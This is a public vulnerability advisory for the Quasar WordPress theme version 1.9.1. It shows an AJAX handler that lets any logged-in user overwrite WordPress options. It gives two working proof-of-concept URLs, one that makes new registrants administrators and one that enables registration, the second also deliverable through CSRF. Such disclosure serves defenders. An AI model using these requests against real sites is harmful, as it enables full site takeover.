------------------------------------------------------------------------------
WordPress Quasar Theme Previlege Escalation
------------------------------------------------------------------------------


[-] Theme Link:

http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock


[-] Affected Version:

Version 1.9.1


[-] Vulnerability Description:

The vulnerable code is located in the /rock-builder/rock-builder-ui.php
script:

function rock_builder_save_template(){

    $data = $_REQUEST['data'];
    $template = $_REQUEST['template'];

    $templateName = $template['name'];
    $templateDBName = $template['database_name'];
    update_option($templateDBName, $data);

    $builderReferences = get_option("rock_builder_references",array());

    $i = 0;
    foreach($builderReferences as $ref){
        if($ref['database_name'] == $templateDBName){
            $builderReferences[$i]['name'] = $templateName;
            update_option("rock_builder_references",$builderReferences);
            //echo "FOUND";
            break;
        }
        $i++;
    }

    exit;
}
add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");

then function rock_builder_save_template can be called by logged in users
and executed which can lead to modifying wordpress settings and adding a
new administrator which may cause the site a full take over


[-] Proof of Concept:


Accessing The Url below with a logged in user will set the default role of
any new registered user as administrator(if you already had a user)
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_role

Accessing The Url below with a logged in user will allow user registration
if it was disabled
this can be exploited by sending it to a logged in user or administrater
(CSRF)
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_register